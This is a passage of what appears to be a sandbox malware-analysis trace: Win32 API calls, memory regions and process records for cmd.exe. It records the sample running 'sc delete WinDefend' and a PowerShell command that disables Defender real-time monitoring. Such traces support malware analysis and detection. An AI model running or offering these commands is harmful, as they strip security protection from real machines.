lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.590] InitializeProcThreadAttributeList (in: lpAttributeList=0x45f544, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x45f60c | out: lpAttributeList=0x45f544, lpSize=0x45f60c) returned 1 [0140.590] UpdateProcThreadAttribute (in: lpAttributeList=0x45f544, dwFlags=0x0, Attribute=0x60001, lpValue=0x45f604, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x45f544, lpPreviousValue=0x0) returned 1 [0140.590] GetStartupInfoW (in: lpStartupInfo=0x45f500 | out: lpStartupInfo=0x45f500*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0140.590] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0140.590] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0140.590] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0140.590] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0140.590] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0140.590] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0140.590] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0140.590] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0140.590] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0140.590] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0140.590] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0140.590] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0140.590] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0140.590] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0140.590] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0140.590] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0140.590] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0140.590] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0140.590] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.590] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.590] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.590] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.591] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.591] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.591] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.591] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.591] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.591] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0140.591] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0140.591] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0140.591] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0140.591] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0140.591] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0140.591] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0140.591] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0140.591] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0140.591] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0140.591] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0140.591] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0140.591] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0140.591] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0140.592] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc delete WinDefend", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x45f5a0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc delete WinDefend", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x45f5ec | out: lpCommandLine="sc delete WinDefend", lpProcessInformation=0x45f5ec*(hProcess=0x78, hThread=0x74, dwProcessId=0x9b8, dwThreadId=0x9c8)) returned 1 [0140.595] CloseHandle (hObject=0x74) returned 1 [0140.595] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0140.595] GetEnvironmentStringsW () returned 0x233f18* [0140.595] FreeEnvironmentStringsW (penv=0x233f18) returned 1 [0140.595] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0141.110] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x45f4e0 | out: lpExitCode=0x45f4e0*=0x0) returned 1 [0141.110] CloseHandle (hObject=0x78) returned 1 [0141.110] _vsnwprintf (in: _Buffer=0x45f628, _BufferCount=0x13, _Format="%08X", _ArgList=0x45f4ec | out: _Buffer="00000000") returned 8 [0141.110] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0141.110] GetEnvironmentStringsW () returned 0x235210* [0141.110] FreeEnvironmentStringsW (penv=0x235210) returned 1 [0141.110] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0141.110] GetEnvironmentStringsW () returned 0x235210* [0141.110] FreeEnvironmentStringsW (penv=0x235210) returned 1 [0141.110] DeleteProcThreadAttributeList (in: lpAttributeList=0x45f544 | out: lpAttributeList=0x45f544) [0141.110] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.111] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0141.111] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.111] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a0b41ac | out: lpMode=0x4a0b41ac) returned 1 [0141.111] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.111] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a0b41b0 | out: lpMode=0x4a0b41b0) returned 1 [0141.111] SetConsoleInputExeNameW () returned 0x1 [0141.111] GetConsoleOutputCP () returned 0x1b5 [0141.111] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a0b4260 | out: lpCPInfo=0x4a0b4260) returned 1 [0141.111] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.111] exit (_Code=0) Process: id = "20" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x6e012000" os_pid = "0x558" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0x668" cmd_line = "/c powershell Set-MpPreference -DisableRealtimeMonitoring $true" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2735 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2736 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2737 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2738 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2739 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 2740 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 2741 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 2742 start_va = 0x4a090000 end_va = 0x4a0dbfff entry_point = 0x4a090000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 2743 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2744 start_va = 0x77e20000 end_va = 0x77f9ffff entry_point = 0x77e20000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2745 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 2746 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 2747 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 2748 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 2749 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2750 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2751 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2773 start_va = 0x400000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2774 start_va = 0x752a0000 end_va = 0x752a7fff entry_point = 0x752a0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2775 start_va = 0x752b0000 end_va = 0x7530bfff entry_point = 0x752b0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2776 start_va = 0x75310000 end_va = 0x7534efff entry_point = 0x75310000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3268 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3269 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 3270 start_va = 0x210000 end_va = 0x276fff entry_point = 0x210000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3271 start_va = 0x350000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 3272 start_va = 0x670000 end_va = 0x76ffff entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 3273 start_va = 0x754b0000 end_va = 0x754b6fff entry_point = 0x754b0000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 3274 start_va = 0x75970000 end_va = 0x7597bfff entry_point = 0x75970000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3275 start_va = 0x75980000 end_va = 0x759dffff entry_point = 0x75980000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3276 start_va = 0x759e0000 end_va = 0x759f8fff entry_point = 0x759e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3277 start_va = 0x75a10000 end_va = 0x75abbfff entry_point = 0x75a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3278 start_va = 0x75f40000 end_va = 0x75f85fff entry_point = 0x75f40000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3279 start_va = 0x75fa0000 end_va = 0x7603cfff entry_point = 0x75fa0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 3280 start_va = 0x760d0000 end_va = 0x761bffff entry_point = 0x760d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3281 start_va = 0x76220000 end_va = 0x7632ffff entry_point = 0x76220000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3282 start_va = 0x76490000 end_va = 0x7652ffff entry_point = 0x76490000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3283 start_va = 0x76a70000 end_va = 0x76afffff entry_point = 0x76a70000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3284 start_va = 0x77810000 end_va = 0x77819fff entry_point = 0x77810000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 3285 start_va = 0x77820000 end_va = 0x7791ffff entry_point = 0x77820000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3286 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x0 region_type = private name = "private_0x0000000077a20000" filename = "" Region: id = 3287 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x0 region_type = private name = "private_0x0000000077b20000" filename = "" Region: id = 3288 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3289 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3290 start_va = 0x480000 end_va = 0x607fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 3291 start_va = 0x75c00000 end_va = 0x75c5ffff entry_point = 0x75c00000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3292 start_va = 0x75e50000 end_va = 0x75f1bfff entry_point = 0x75e50000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3293 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3294 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 3295 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 3296 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 3297 start_va = 0x770000 end_va = 0x8f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 3298 start_va = 0x900000 end_va = 0x1cfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 3299 start_va = 0x1d00000 end_va = 0x2042fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d00000" filename = "" Region: id = 3370 start_va = 0x2050000 end_va = 0x231efff entry_point = 0x2050000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 150 os_tid = 0x97c [0140.899] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fa6c | out: lpSystemTimeAsFileTime=0x20fa6c*(dwLowDateTime=0xf36df600, dwHighDateTime=0x1d48db2)) [0140.899] GetCurrentProcessId () returned 0x558 [0140.899] GetCurrentThreadId () returned 0x97c [0140.899] GetTickCount () returned 0x2ed6a [0140.899] QueryPerformanceCounter (in: lpPerformanceCount=0x20fa64 | out: lpPerformanceCount=0x20fa64*=1820852300000) returned 1 [0140.900] GetModuleHandleA (lpModuleName=0x0) returned 0x4a090000 [0140.900] __set_app_type (_Type=0x1) [0140.900] __p__fmode () returned 0x75ab31f4 [0140.900] __p__commode () returned 0x75ab31fc [0140.900] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a0b21a6) returned 0x0 [0140.900] __getmainargs (in: _Argc=0x4a0b4238, _Argv=0x4a0b4240, _Env=0x4a0b423c, _DoWildCard=0, _StartInfo=0x4a0b4140 | out: _Argc=0x4a0b4238, _Argv=0x4a0b4240, _Env=0x4a0b423c) returned 0 [0140.900] GetCurrentThreadId () returned 0x97c [0140.900] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x97c) returned 0x60 [0140.900] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76220000 [0140.901] GetProcAddress (hModule=0x76220000, lpProcName="SetThreadUILanguage") returned 0x7624a84f [0140.901] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.901] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.901] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20f9fc | out: phkResult=0x20f9fc*=0x0) returned 0x2 [0140.901] VirtualQuery (in: lpAddress=0x20fa33, lpBuffer=0x20f9cc, dwLength=0x1c | out: lpBuffer=0x20f9cc*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.901] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20f9cc, dwLength=0x1c | out: lpBuffer=0x20f9cc*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.901] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20f9cc, dwLength=0x1c | out: lpBuffer=0x20f9cc*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0140.901] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20f9cc, dwLength=0x1c | out: lpBuffer=0x20f9cc*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.901] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20f9cc, dwLength=0x1c | out: lpBuffer=0x20f9cc*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0140.901] GetConsoleOutputCP () returned 0x1b5 [0140.901] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a0b4260 | out: lpCPInfo=0x4a0b4260) returned 1 [0140.901] SetConsoleCtrlHandler (HandlerRoutine=0x4a0ae72a, Add=1) returned 1 [0140.901] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.902] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0140.902] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.902] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a0b41ac | out: lpMode=0x4a0b41ac) returned 1 [0140.902] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.902] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.902] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.902] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a0b41b0 | out: lpMode=0x4a0b41b0) returned 1 [0140.902] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.902] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0140.903] GetEnvironmentStringsW () returned 0x681fc8* [0140.903] FreeEnvironmentStringsW (penv=0x681fc8) returned 1 [0140.903] GetEnvironmentStringsW () returned 0x681fc8* [0140.903] FreeEnvironmentStringsW (penv=0x681fc8) returned 1 [0140.903] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e96c | out: phkResult=0x20e96c*=0x68) returned 0x0 [0140.903] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e974, lpData=0x20e978, lpcbData=0x20e970*=0x1000 | out: lpType=0x20e974*=0x0, lpData=0x20e978*=0x0, lpcbData=0x20e970*=0x1000) returned 0x2 [0140.903] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e974, lpData=0x20e978, lpcbData=0x20e970*=0x1000 | out: lpType=0x20e974*=0x4, lpData=0x20e978*=0x1, lpcbData=0x20e970*=0x4) returned 0x0 [0140.903] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e974, lpData=0x20e978, lpcbData=0x20e970*=0x1000 | out: lpType=0x20e974*=0x0, lpData=0x20e978*=0x1, lpcbData=0x20e970*=0x1000) returned 0x2 [0140.903] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e974, lpData=0x20e978, lpcbData=0x20e970*=0x1000 | out: lpType=0x20e974*=0x4, lpData=0x20e978*=0x0, lpcbData=0x20e970*=0x4) returned 0x0 [0140.903] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e974, lpData=0x20e978, lpcbData=0x20e970*=0x1000 | out: lpType=0x20e974*=0x4, lpData=0x20e978*=0x40, lpcbData=0x20e970*=0x4) returned 0x0 [0140.903] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e974, lpData=0x20e978, lpcbData=0x20e970*=0x1000 | out: lpType=0x20e974*=0x4, lpData=0x20e978*=0x40, lpcbData=0x20e970*=0x4) returned 0x0 [0140.903] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e974, lpData=0x20e978, lpcbData=0x20e970*=0x1000 | out: lpType=0x20e974*=0x0, lpData=0x20e978*=0x40, lpcbData=0x20e970*=0x1000) returned 0x2 [0140.903] RegCloseKey (hKey=0x68) returned 0x0 [0140.903] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e96c | out: phkResult=0x20e96c*=0x68) returned 0x0 [0140.904] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e974, lpData=0x20e978, lpcbData=0x20e970*=0x1000 | out: lpType=0x20e974*=0x0, lpData=0x20e978*=0x40, lpcbData=0x20e970*=0x1000) returned 0x2 [0140.904] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e974, lpData=0x20e978, lpcbData=0x20e970*=0x1000 | out: lpType=0x20e974*=0x4, lpData=0x20e978*=0x1, lpcbData=0x20e970*=0x4) returned 0x0 [0140.904] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e974, lpData=0x20e978, lpcbData=0x20e970*=0x1000 | out: lpType=0x20e974*=0x0, lpData=0x20e978*=0x1, lpcbData=0x20e970*=0x1000) returned 0x2 [0140.904] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e974, lpData=0x20e978, lpcbData=0x20e970*=0x1000 | out: lpType=0x20e974*=0x4, lpData=0x20e978*=0x0, lpcbData=0x20e970*=0x4) returned 0x0 [0140.904] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e974, lpData=0x20e978, lpcbData=0x20e970*=0x1000 | out: lpType=0x20e974*=0x4, lpData=0x20e978*=0x9, lpcbData=0x20e970*=0x4) returned 0x0 [0140.904] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e974, lpData=0x20e978, lpcbData=0x20e970*=0x1000 | out: lpType=0x20e974*=0x4, lpData=0x20e978*=0x9, lpcbData=0x20e970*=0x4) returned 0x0 [0140.904] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e974, lpData=0x20e978, lpcbData=0x20e970*=0x1000 | out: lpType=0x20e974*=0x0, lpData=0x20e978*=0x9, lpcbData=0x20e970*=0x1000) returned 0x2 [0140.904] RegCloseKey (hKey=0x68) returned 0x0 [0140.904] time (in: timer=0x0 | out: timer=0x0) returned 0x5c09a272 [0140.904] srand (_Seed=0x5c09a272) [0140.904] GetCommandLineW () returned="/c powershell Set-MpPreference -DisableRealtimeMonitoring $true" [0140.904] GetCommandLineW () returned="/c powershell Set-MpPreference -DisableRealtimeMonitoring $true" [0140.904] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a0b5260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.904] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x681fd0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0140.904] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.904] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.904] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.905] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0140.905] 